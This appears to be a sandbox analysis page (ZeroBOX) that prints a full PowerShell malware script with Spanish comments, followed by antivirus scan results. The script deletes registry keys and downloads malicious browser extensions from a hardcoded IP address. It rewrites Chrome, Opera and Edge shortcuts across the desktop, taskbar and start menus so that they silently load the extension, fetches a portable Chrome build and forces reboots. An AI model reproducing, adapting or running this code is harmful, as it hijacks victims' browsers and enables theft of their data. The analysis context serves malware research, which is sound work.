Static | ZeroBOX

# Define la ruta del registro y el nombre del valor a eliminar

$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"

$valueName = "SetSafeMode"

# Intenta eliminar el valor del registro

Remove-ItemProperty -Path $registryPath -Name $valueName -ErrorAction Stop

Write-Host "El valor del registro '$valueName' fue eliminado exitosamente."

} catch {

Write-Host "No se pudo eliminar el valor del registro '$valueName'. Aseg

rate de tener permisos suficientes y de que el valor exista."

# Guardar el valor actual de ConfirmPreference

$oldConfirmPreference = $ConfirmPreference

# Establecer ConfirmPreference en None para evitar la confirmaci

$ConfirmPreference = 'None'

# Eliminar la clave .lnk sin confirmaci

Remove-Item -Path "Registry::HKEY_CLASSES_ROOT\.lnk" -Recurse -Force

# Eliminar la clave MiArchivoLnk y sus subclaves sin confirmaci

Remove-Item -Path "Registry::HKEY_CLASSES_ROOT\MiArchivoLnk" -Recurse -Force

# Restaurar el valor original de ConfirmPreference

$ConfirmPreference = $oldConfirmPreference

$nombre_del_zip = -join ((48..57) + (97..122) | Get-Random -Count 16 | % {[char]$_})

$rutaArchivoFirefox = $env:PUBLIC + "\Downloads\" + $nombre_del_zip + ".xpi"

$path_del_zip = $env:PUBLIC + "\Documents\" + $nombre_del_zip + ".zip"

$path_del_folder = $env:PUBLIC + "\Documents\" + $nombre_del_zip

$program_data_base_path = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\"

$app_data_base_path = $env:APPDATA + "\Microsoft\Windows\Start Menu\Programs\"

$taskbar_base_path = $env:APPDATA + "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\"

$desktop_base_path = [Environment]::GetFolderPath("Desktop") + "\"

$public_desktop_base_path = $env:PUBLIC + "\Desktop\"

$url_firefox = "http://64.94.84.206/extensionreptil2.xpi"

$firefoxPath1 = "C:\Program Files\Mozilla Firefox\firefox.exe"

$firefoxPath2 = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe"

$com_shell = New-Object -COM WScript.Shell

$chromium_argument = "--load-extension=C:\Users\Public\Documents\" + $nombre_del_zip

$onedrive_base_path = $env:OneDrive + "\Escritorio\"

$onedrive_base_path_2 = $env:OneDrive + "\Desktop\"

$chrome_portable = "http://64.94.84.206/portable.zip"

Invoke-RestMethod -Uri "http://64.94.84.206/extension3922.zip" -OutFile $path_del_zip 2>$null

Expand-Archive -Path $path_del_zip -DestinationPath $path_del_folder 2>$nul

function CreateLnkWIco {

Param($AbsPath, $Icon, $Path)

$lnk = $com_shell.CreateShortcut($AbsPath)

$lnk.TargetPath = $Path

$lnk.Arguments = $chromium_argument

$lnk.IconLocation = $Icon

$lnk.Save() 2>$null

function CreateLnk {

Param($AbsPath, $Icon, $Path)

$lnk = $com_shell.CreateShortcut($AbsPath)

$lnk.TargetPath = $Path

$lnk.Arguments = $chromium_argument

$lnk.Save() 2>$null

function ModifyLnk {

Param($AbsPath)

$lnk = $com_shell.CreateShortcut($AbsPath)

$lnk.Arguments = $chromium_argument

$lnk.Save() 2>$null

function PatchEdge {

Param($browserName, $path, $icon)

if(Test-Path $onedrive_base_path) {

$onedrive_path = $onedrive_base_path + $browserName

CreateLnkWIco -AbsPath $onedrive_path -Icon $icon -Path $path

if(Test-Path $onedrive_base_path_2) {

$onedrive_path_2 = $onedrive_base_path_2 + $browserName

CreateLnkWIco -AbsPath $onedrive_path_2 -Icon $icon -Path $path

if(Test-Path $public_desktop_base_path) {

$public_desktop_path = $public_desktop_base_path + $browserName

CreateLnkWIco -AbsPath $public_desktop_path -Icon $icon -Path $path

if(Test-Path $desktop_base_path) {

$desktop_path = $desktop_base_path + $browserName

CreateLnkWIco -AbsPath $desktop_path -Icon $icon -Path $path

if(Test-Path $app_data_base_path) {

$app_data_path = $app_data_base_path + $browserName

CreateLnkWIco -AbsPath $app_data_path -Icon $icon -Path $path

if(Test-Path $program_data_base_path) {

$programdata_path = $program_data_base_path + $browserName

CreateLnkWIco -AbsPath $programdata_path -Icon $icon -Path $path

if(Test-Path $taskbar_base_path) {

$taskbar_path = $taskbar_base_path + $browserName

CreateLnkWIco -AbsPath $taskbar_path -Icon $icon -Path $path

function PatchChrome {

Param($browserName, $path, $icon)

if(Test-Path $onedrive_base_path) {

$onedrive_path = $onedrive_base_path + $browserName

if(Test-Path $onedrive_path) {

ModifyLnk -AbsPath $onedrive_path

} else {

CreateLnk -AbsPath $onedrive_path -Icon $icon -Path $path

}

if(Test-Path $onedrive_base_path_2) {

$onedrive_path_2 = $onedrive_base_path_2 + $browserName

if(Test-Path $onedrive_path_2) {

ModifyLnk -AbsPath $onedrive_path_2

} else {

CreateLnk -AbsPath $onedrive_path_2 -Icon $icon -Path $path

}

if(Test-Path $public_desktop_base_path) {

$public_desktop_path = $public_desktop_base_path + $browserName

if(Test-Path $public_desktop_path) {

ModifyLnk -AbsPath $public_desktop_path

} else {

CreateLnk -AbsPath $public_desktop_path -Icon $icon -Path $path

}

if(Test-Path $desktop_base_path) {

$desktop_path = $desktop_base_path + $browserName

if (Test-Path $desktop_path) {

ModifyLnk -AbsPath $desktop_path

} else {

CreateLnk -AbsPath $desktop_path -Icon $icon -Path $path

}

$appdata_path = $app_data_base_path + $browserName

if (Test-Path $appdata_path) {

ModifyLnk -AbsPath $appdata_path

} else {

CreateLnk -AbsPath $appdata_path -Icon $icon -Path $path

$programdata_path = $program_data_base_path + $browserName

if (Test-Path $programdata_path) {

ModifyLnk -AbsPath $programdata_path

} else {

CreateLnk -AbsPath $programdata_path -Icon $icon -Path $path

$taskbar_path = $taskbar_base_path + $browserName

if(Test-Path $taskbar_path) {

ModifyLnk -AbsPath $taskbar_path

} else {

CreateLnk -AbsPath $taskbar_path -Icon $icon -Path $path

Function GetInstalledApps {

Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',

'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',

'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',

'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*' -ErrorAction Ignore |

Where-Object DisplayName |

Select-Object -Property DisplayName, InstallLocation, DisplayIcon |

Sort-Object -Property DisplayName

GetInstalledApps | ForEach-Object {

if($_.DisplayName -match "Chrome") {

$exe_path = $_.InstallLocation + "\chrome.exe"

PatchChrome -browserName "Google Chrome.lnk" -path $exe_path -icon $_.DisplayIcon

} elseif($_.DisplayName -match "Opera Stable") {

$exe_path = $_.InstallLocation + "\opera.exe"

PatchChrome -browserName "Navegador Opera.lnk" -path $exe_path -icon $_.DisplayIcon

} elseif ($_.DisplayName -match "Opera GX") {

$exe_path = $_.InstallLocation + "\opera.exe"

PatchChrome -browserName "Navegador Opera GX.lnk" -path $exe_path -icon $_.DisplayIcon

} elseif ($_.DisplayName -match "Firefox") {

Invoke-WebRequest -Uri $url_firefox -OutFile $rutaArchivoFirefox

if (Test-Path $firefoxPath1) {

Start-Process -FilePath $firefoxPath1 -ArgumentList $rutaArchivoFirefox

} elseif (Test-Path $firefoxPath2) {

Start-Process -FilePath $firefoxPath2 -ArgumentList $rutaArchivoFirefox

}

} elseif ($_.DisplayName -eq "Microsoft Edge") {

$ico = $path_del_folder + "\edge.ico"

$default_chrome_path = $env:ProgramFiles + "\Google\Chrome\Application\chrome.exe"

if(Test-Path $default_chrome_path) {

PatchEdge -browserName "Microsoft Edge.lnk" -path $default_chrome_path -icon $ico

} else {

$hash_edge = -join ((48..57) + (97..122) | Get-Random -Count 16 | % {[char]$_})

$target_filename = $env:PUBLIC + "\Documents\"+$hash_edge+".zip"

$destination_path = $env:PUBLIC + "\Documents\"+$hash_edge

$exe_path = $destination_path + "\chrome.exe"

Invoke-WebRequest -Uri $chrome_portable -Method Get -OutFile $target_filename

Expand-Archive -Path $target_filename -DestinationPath $destination_path

PatchEdge -browserName "Microsoft Edge.lnk" -path $exe_path -icon $ico

}

Stop-Process -Name msedge -Force 2>$null

$safeBootKey = "HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Option"

$optionValue = Get-ItemProperty -Path $safeBootKey -Name OptionValue -ErrorAction Stop

if($optionValue.OptionValue -ne $null) {

try {

while($true) {

$firefoxProcess = Get-Process firefox -ErrorAction Stop

if($firefoxProcess) {

Start-Sleep -Seconds 3;

} else {

Restart-Computer -Force

break

}

} catch {

Restart-Computer -Force

}

} catch {

Antivirus	Signature
Bkav	Clean
Lionic	Clean
tehtris	Clean
ClamAV	Clean
CMC	Clean
CAT-QuickHeal	Clean
Skyhigh	Clean
ALYac	Clean
Malwarebytes	Clean
Zillya	Clean
Sangfor	Clean
K7AntiVirus	Clean
K7GW	Clean
Cybereason	Clean
Baidu	Clean
VirIT	Clean
Symantec	Clean
ESET-NOD32	Clean
TrendMicro-HouseCall	Clean
Avast	Clean
Cynet	Clean
Kaspersky	Clean
BitDefender	Heur.BZC.PZQ.Boxter.231.BA309EB8
NANO-Antivirus	Clean
ViRobot	Clean
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.231.BA309EB8
Tencent	Clean
TACHYON	Clean
Sophos	Clean
F-Secure	Clean
DrWeb	Clean
VIPRE	Heur.BZC.PZQ.Boxter.231.BA309EB8
TrendMicro	Clean
FireEye	Heur.BZC.PZQ.Boxter.231.BA309EB8
Emsisoft	Heur.BZC.PZQ.Boxter.231.BA309EB8 (B)
huorong	Clean
GData	Heur.BZC.PZQ.Boxter.231.BA309EB8
Jiangmin	Clean
Varist	Clean
Avira	Clean
Antiy-AVL	Clean
Kingsoft	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Heur.BZC.PZQ.Boxter.231.B2F93054
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Microsoft	Clean
Google	Clean
AhnLab-V3	Clean
Acronis	Clean
McAfee	Clean
MAX	malware (ai score=86)
VBA32	Clean
Zoner	Clean
Rising	Clean
Yandex	Clean
Ikarus	Clean
MaxSecure	Clean
Fortinet	Clean
BitDefenderTheta	Clean
AVG	Clean
Panda	Clean
CrowdStrike	Clean
alibabacloud	Clean